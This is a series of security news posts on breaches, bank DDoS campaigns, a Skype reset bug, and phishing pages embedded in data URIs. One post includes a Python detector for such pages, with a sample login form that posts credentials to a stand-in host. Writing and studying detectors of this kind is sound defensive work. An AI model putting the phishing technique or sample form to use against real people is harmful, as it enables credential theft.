Evernote Breached; Enforces Password Reset

Popular note-taking service Evernote has announced that it recently suffered a data breach. Thankfully, according to a post on the Evernote blog, the hackers were not able to break in and access the stored notes of individual users.

However, they did get access to usernames and encrypted passwords. Evernote stores passwords only after hashing and salting them, so there is little chance that, even with the encrypted passwords in hand, the hackers will be able to recover the original ones.

Nonetheless, Evernote is asking its users to reset their passwords to ensure maximum safety.

After signing in, you will be prompted to enter your new password. Once you have reset your password on evernote.com, you will need to enter this new password in other Evernote apps that you use. We are also releasing updates to several of our apps to make the password change process easier, so please check for updates over the next several hours.

The Evernote hack comes in the wake of a series of data breaches at high-profile tech companies such as Facebook, Twitter, Microsoft and Apple. Evernote hasn’t released any details on how the actual hacking occurred, but props have to be given to the company for its quick action in letting users know about the hacking and resetting their passwords as soon as possible.

Twitter Suffers Data Breach; 250k Accounts Affected

Twitter has released information regarding a hacking attempt which led to a partial breach of around 250,000 accounts.

In a blog post, Bob Lord, Director of Information Security, states:

This week, we detected unusual access patterns that led to us identifying unauthorized access attempts to Twitter user data. We discovered one live attack and were able to shut it down in process moments later. However, our investigation has thus far indicated that the attackers may have had access to limited user information – usernames, email addresses, session tokens and encrypted/salted versions of passwords – for approximately 250,000 users.

Twitter will notify the affected users to reset their passwords, and their old passwords will no longer work. If you have received such an email from Twitter, change your password immediately and make sure that it is a strong one. A strong password should have at least 8 characters, be alphanumeric, and contain upper-case letters, lower-case letters and special characters. You could also use services like LastPass and 1Password to generate and manage passwords.

As of now, we don’t know how they were able to breach Twitter’s security. Twitter says that it was not an isolated incident and that the attacks were highly sophisticated. Just two weeks ago, major newspapers such as the New York Times and the Washington Post suffered data breaches which allegedly originated from China. So far, there are no reports that these attacks are linked.

Citibank and BoA Websites DDoSed by Al-Qassam Cyber Fighters

The new year has started on a disturbing note for Citibank and Bank of America (BoA), as the Al-Qassam Cyber Fighters have begun a DDoS attack against them. The attack is not a surprise, as it was announced back in December last year. This is the second phase of their Operation Ababil, which started on 27 December last year. The operation seems to have one agenda only: to get the controversial anti-Islamic video removed from YouTube and to stop the organized western offensive against Islam (if there is such a thing).


The first phase of Al-Qassam’s attack took place in October, after which they took a break for Eid al-Adha. The list of targets for this second phase includes US Bancorp, JPMorgan Chase, Bank of America (BoA), PNC Financial Services Group and SunTrust. The hackers at Al-Qassam said:

In new phase, the wideness and the number of attacks will increase explicitly; and offenders and subsequently their governmental supporters will not be able to imagine and forecast the widespread and greatness of these attacks.

The hackers are extremely confident about their mission and have been able to cause temporary interruptions of service at BoA and Citibank. While Bank of America was already attacked in the first phase, Citibank is being attacked by the Al-Qassam Cyber Fighters for the first time.

Citibank has announced the disruption in service on its official Twitter account.

This hacker collective has no affiliation with Anonymous, and is one of a kind in that it has risen to defend Islam, unlike other hacker groups.

Skype Password Reset Bug Allows Anyone to Hack a Skype Account

Hackers have discovered a new vulnerability in Skype that could allow practically anyone to reset any Skype account if the associated email address is known.

The vulnerability, which first surfaced on Russian hacker forums, was first reported by The Next Web, which verified the vulnerability and was able to reproduce the hack twice. The hack basically involves creating a secondary account using the target’s email address associated with Skype. Using this secondary account, one can access the original Skype account and change the target’s password.

Microsoft has since acknowledged the issue and, for the moment, has taken down the password reset page from Skype’s website.

We have had reports of a new security vulnerability issue. As a precautionary step we have temporarily disabled password reset as we continue to investigate the issue further. We apologize for the inconvenience but user experience and safety is our first priority.

This issue only applies to Skype accounts; Microsoft accounts, which can also be used to log in to Skype, are not affected by this vulnerability.

LG Smart World Hacked, User Information Leaked

A hacker going by the Twitter handle @Ur0b0r0x has breached LG Smart World and leaked the email addresses and password hashes of 11,316 users [please see update below]. Smart World is LG’s official app store, providing apps for smart TVs, smartphones and home appliances. The same hacker had earlier hacked 32 websites belonging to the Government of Colombia.


The hacked data dump has already been indexed by OZ Data Centa. If you want to find out whether your info has been leaked, head over to ozdc.net and search for your email address. According to OZDC, the leaked data contains 11,203 valid emails, 284 of which had already been compromised in some other data breach. Thankfully, LG was not storing passwords in plain text; however, I am not sure exactly which hashing algorithm it was using. If your account has been affected, immediately change your password on Smart World as well as on all other websites where you were using the same password.

Nothing on the internet is truly secure, and data and privacy breaches are often inevitable. However, you can avoid being burned by being prepared for the worst-case scenario. Some elementary precautions are:

  • Using distinct, non-guessable passwords that are not dictionary words. You can use a password manager like LastPass to manage your various accounts.
  • Enabling two-step authentication on services like Gmail that support it.
  • Using a truly secure secret question for password reset options.

Update: An LG spokesperson reached out to us stating that LG has been unable to verify a breach. “As far as we know, no private or sensitive information has been accessed”, he added.

Extremist Hacker Group Takes Down Wells Fargo Website

“Izz ad-din Al qassam” has become quite notorious over the last few days because of its series of attacks on US financial institutions. Last week, they targeted Bank of America, the NYSE and Chase bank. Their modus operandi is the DDoS attack, and it is speculated that they are being sponsored by the Government of Iran. However, they have denied any such political affiliation. Just like Anonymous and its affiliated hacker groups, they have taken to Pastebin to announce their wins.


Apparently, this is the second week of their Operation Ababil, and they describe the operation as follows:

In the previous announcements, we stated that we will not tolerate insulting exalted character of the prophet of mercy and kindness. Due to the insult, we planned and accomplished a series of cyber operations against the insulting country’s credit and financial centers.

Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad (Peace Be upon Him). So as we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet.

The hacker group has a “timetable” for this week’s attacks, with the Wells Fargo, US Bank and PNC websites scheduled for Tuesday, Wednesday and Thursday respectively. The “Izz ad-din Al qassam” group has claimed that these attacks will continue until the movie defaming Prophet Muhammad is removed from YouTube. The movie has already resulted in a lot of violence in Syria, and now this cyber-warfare against the US is taking a further toll.

You can read this Pastebin paste for the complete declaration.


Al-Jazeera Hacked by Syrian Hacker Group Al-Rashedon

Al-Rashedon, a Syrian hacker group, has hacked a slew of Al-Jazeera websites over their reporting of the unrest in Syria. The hack affected Al-Jazeera’s English and Arabic websites, and on Tuesday left them defaced with an image carrying the group’s message.


The group’s message to Al-Jazeera, as seen in the defacement image, reads:

In response to your stand against Syria (Government and the People) And your support to terrorist groups in addition to spreading lies and made up news.. We have hacked your website and this is our retaliation.

The Syrian hacker group accuses Al-Jazeera of spreading fabricated news and supporting armed terrorist groups. Although Syria has another known hacker group, the Syrian Electronic Army, there was no word from them on this hack. Al-Jazeera has not officially commented on the hack either.

Qatar-based Al-Jazeera takes a lot of heat from dictatorial governments like Egypt, Syria and the Saudi kingdom for its aggressive coverage of the instability in the region. Al-Jazeera also saw an exodus of journalists over biased reporting of the situation in Syria. A few months ago, the official Twitter account of Al-Jazeera was hacked by Assad loyalists. The political scenario in the Middle East is quite tense and disturbing, and perhaps Al-Jazeera is being dominated by its government to reflect that government’s foreign policy. However, this is a clear indication of what can happen in a modern-day political war, where everything is driven by computer technology and is equally vulnerable.

Phishing 2.0; Phishing Without Fake Webpages

Nowadays everyone is familiar with phishing attacks: the process of obtaining confidential information from a person by communicating with the victim (using emails, phone calls etc.) while posing as someone else. The typical phishing attack involves creating a fake login page, storing it on a server and emailing the victim a link to it. Now a new research paper from InfoSec student Henning Klevjer shows how a hacker can create phishing attacks without storing the fake login page on a server at all.

This method uses a URI, or uniform resource identifier, which is basically a string of characters used to identify a name or a resource. Using a data URI, the required data (the code for the login page in this case) is stored within the URI itself, with the following scheme:

data:[<mediatype>][;base64],<data> 

Here <data> contains the fake login page. The procedure for creating a phishing URI starts with building a login page using the code from the original page. The original code is modified so that the entered data, such as the password, is sent to a location of the hacker’s choosing. This page is then encoded using a scheme called Base64, a method of encoding binary data in ASCII form that increases the data size by around 33%. The final step is to append this encoded page to the URI.

The final URI will be extremely long and suspicious-looking. But as all browsers support this URI scheme, it will be rendered properly, as long as it doesn’t exceed the maximum URL length allowed by the browser.

Although the large URI can be masked using a URL-shortening service, Henning states that this method has some major limitations thanks to the implementation of data URIs in Chrome and Internet Explorer.
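A check that a mail gateway or URL filter could apply to links like these, written as an added example that is not from Klevjer’s paper or from this post: it parses a data: URI according to the data:[<mediatype>][;base64],<data> scheme above, decodes the Base64 payload and flags HTML that carries a password field, also reporting the roughly 33% size increase mentioned above. The sample login form and the collector.invalid host are constructed for the test.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample: a minimal HTML login form of the kind an inline
# phishing page would carry, used here only to exercise the detector.
SAMPLE_HTML = (
    '<html><body><form method="post" action="http://collector.invalid/">'
    '<input name="user"><input type="password" name="pass">'
    '<input type="submit"></form></body></html>'
)
SAMPLE_DATA_URI = "data:text/html;base64," + base64.b64encode(
    SAMPLE_HTML.encode()).decode()

# data:[<mediatype>][;base64],<data>  (mediatype may include ;charset=...)
_DATA_URI_RE = re.compile(r"^data:([^,]*?)(;base64)?,(.*)$", re.DOTALL | re.IGNORECASE)
_FORM_RE = re.compile(r"<form\b[^>]*\baction\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)
_PASSWORD_RE = re.compile(r"<input\b[^>]*\btype\s*=\s*['\"]?password", re.IGNORECASE)


def parse_data_uri(uri):
    """Split a data: URI into (mediatype, decoded payload bytes)."""
    m = _DATA_URI_RE.match(uri.strip())
    if not m:
        raise ValueError("not a data: URI")
    mediatype = m.group(1) or "text/plain"  # the scheme's default
    if m.group(2):
        payload = base64.b64decode(m.group(3))
    else:
        payload = unquote(m.group(3)).encode()  # plain, percent-encoded data
    return mediatype, payload


def inspect_data_uri(uri):
    """Describe why a data: URI looks like an inline (serverless) phishing page."""
    mediatype, payload = parse_data_uri(uri)
    text = payload.decode("utf-8", errors="replace")
    form = _FORM_RE.search(text)
    findings = {
        "mediatype": mediatype,
        "decoded_bytes": len(payload),
        "encoded_chars": len(uri.split(",", 1)[1]),
        "is_html": mediatype.lower().startswith("text/html"),
        "has_password_field": bool(_PASSWORD_RE.search(text)),
        # where the credentials would be posted; worth logging for blocklists
        "form_action": form.group(1) if form else None,
    }
    findings["suspicious"] = findings["is_html"] and findings["has_password_field"]
    return findings


def base64_overhead(findings):
    """Encoded length divided by decoded length: about 1.33 for Base64."""
    return findings["encoded_chars"] / findings["decoded_bytes"]


if __name__ == "__main__":
    result = inspect_data_uri(SAMPLE_DATA_URI)
    print(result, "overhead=%.2f" % base64_overhead(result))
```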

You can read more about this method here (PDF).

Via: Naked Security

Information Security: Are we Evolving Fast Enough?

In the last two decades, we have seen a lot of changes around us. We have moved from standard-definition to high-definition content and from dial-up internet to high-speed broadband, and our mode of interaction with devices is also changing, with touch and voice input becoming more common. We have also changed the way we communicate and store data: a lot of our data is stored online in the cloud, and most of our communication happens online through Twitter, Facebook etc.

Along with the aforementioned changes, our security policies are also changing. With us trusting more and more of our data to technology companies, it is vital that we think hard about their security procedures. In the early nineties, security policies were framed around the core principles known as CIA: confidentiality, integrity and availability. But times have changed, and so have the bad guys. We can no longer rely on the old principles alone; our security policies have to evolve, and fast. But are we moving fast enough? Let’s take a look.

Just a few weeks ago, WIRED editor Mat Honan’s iCloud account was compromised along with his Amazon account. Using the hacked iCloud account, the hacker remotely wiped the data from his iPhone, iPad and MacBook. How was the hacker able to do it? Shockingly, just by calling Apple customer support! The hacker obtained all of the information required to take control of the account from the internet and from Amazon using social engineering. You can read the entire story here.

This is just one example; you can find a number of incidents like this. Interestingly, most of today’s attacks use social engineering as the preferred method. But has the technology sector evolved enough to protect itself and its customers from these types of attacks? The truth is that, while certain companies are trying their best, many companies do not think outside the box. In a SANS white paper titled “A Multi-Level Defense Against Social Engineering”, David Gragg quotes Keith A. Rhodes, chief technologist at the U.S. General Accounting Office, as follows.

He notes, “Very few companies are worried about this. Every one of them should be.”

Considering that a large number of attacks in 2011 used social engineering, we can easily conclude that his words are very much true. Still, the unfortunate truth is that companies are not training their staff to detect social engineering tactics. For example, a large number of tech companies rely on personal information to reset passwords. In the current age of social networks, that information is fairly easy to obtain, as the Mat Honan incident showed. By not taking our current technological ecosystem into consideration, these companies are effectively creating a loophole that hackers can make use of.

But every time a data breach occurs, can we blame the company or the client? Ted Claypoole, author of ‘Protecting Your Internet Identity: Are You Naked Online?’, says that at certain levels, preventing hacking is simply impossible.

“Everyone is hacked.  Sometimes a company has a big loss, and other times smaller losses. But professional criminals are testing weaknesses all the time, technology changes constantly, and all businesses have been a victim, or will be a victim. Some never know it.

There is no such thing as impenetrable security.  For a thing to have value, you must be able to use it.  And if you can reach it to use it, then so can a bad guy.  Sometimes they impersonate the account holder.  Sometimes they take jobs inside the company and become the security flaw.  Sometimes they exploit the technology.  But every company has “insufficient security policies” by your measure, because every company is vulnerable. Anyone who tells you that their major company has never been breached is either lying, naïve or both.

Last year a hacker, probably foreign government sponsored, broke into RSA, one of our very top security companies, and took information that could allow the hackers to hack defense contractors (like Lockheed Martin).

Our financial protection from harm lies not in company security policies, but in the system itself.  This is why we have a $50 fraud limit on our credit cards, and why, when someone breaks in to steal up to $100,0000 of your money from the bank, they did not just steal your money – they either stole the bank’s money or the government’s money, and yours will be returned.  The system eats billions in fraud each year and we all pay a little bit for it, so that the losses are not as unevenly distributed if it happens to you. So I question your assumption that companies who are hacked have insufficient security policies.  Resources are limited. We can all spend only so much time and money on security.  Sometimes you can have the top security in the world, and the bad guys are simply better.”

And that is certainly true. At times, the bad guys are just too good for us to prevent an incident. But that shouldn’t deter us from creating strong security policies and training our staff to prevent incidents such as the one that happened to Mat. The truth is that, most of the time, the data breach would have been completely avoidable (96% of breaches in 2011 were avoidable, according to the Verizon Business Data Breach Investigations Report, 2011). For example, Microsoft India’s online store was hacked last year and password and credit card data were stolen. Apparently, the company that managed the store on behalf of Microsoft didn’t even bother to encrypt the passwords, making the hacker’s job a walk in the park.

So what can we do to improve our current security infrastructure? What we need is a holistic approach to creating new security policies that takes into account the latest trends and methods of attack. The policies should evolve as fast as the attack vectors do. This is not an easy thing to do, but it has to be done in order to safeguard our data. We could have an internationally valid security certification process, similar to ISO 27001 certification, which analyses the security policies and practices of a company and rates the company on the basis of its policies. This would help customers select the best in terms of security and give companies the necessary ‘push’ to frame the right policies.

Furthermore, governments can pass laws that prioritize the safeguarding of consumer data. Unfortunately, there is no solid law in the US that focuses on protection of consumer data, says Ted. “Lawmakers in the United States are doing very little to force protection of user’s data. Other industrialized nations believe that data privacy and data security is a human right that their citizen’s hold.  This country does not yet acknowledge any such right.  We have laws protecting certain specific classes of information in certain circumstances – some health care data, financial data, and children’s information – but our data protection laws are confused and disjointed.”

While Senators are trying to pass laws such as SOPA for the benefit of the entertainment industry, it would be nice if they could spend a little of their valuable time making solid laws to protect our data as well as our identity online. Only effective security policies along with strong laws can bring about durable changes in the security infrastructure, so that we can sleep tight without worrying about our data.

Spam Wave hits Dropbox Users

Posts from frustrated users are pouring in on the Dropbox forum about receiving spam at email addresses connected to Dropbox. Posts such as the following have been coming in since yesterday.

since today, I receive spam from [website link clipped] to an email address, that is in use at dropbox only ([email protected]).

So I guess you have a security problem with your useraccount data. And this sucks a lot.

Although it is possible for spamming software to pick email addresses at random, the number of affected users indicates some kind of breach on Dropbox’s side.

The initial reply from Dropbox support was as follows:

Generally, it is possible that these email addresses got released to the general population when you either shared a folder or sent a referral invite. When you send these to other people, your email is attached in the reply-to field and it is possible that a compromised referral could have gotten their address book stolen by spammers. This is the most likely scenario.

But apparently users who haven’t used the referral system have also been receiving spam. This spam wave might be the result of a compromise of Dropbox’s mail server, but we can’t be certain of that yet. Last year, a security glitch allowed anyone to log in to any Dropbox account with an incorrect password.

We have contacted Dropbox to find out more about the situation, but haven’t heard back from them yet.

UPDATE: A spokesperson for Dropbox has sent us the following statement.

We’re aware that some Dropbox users have been receiving spam to email addresses associated with their Dropbox accounts. Our top priority is investigating this issue thoroughly and updating you as soon as we can. We know it’s frustrating not to get an update with more details sooner, but please bear with us as our investigation continues.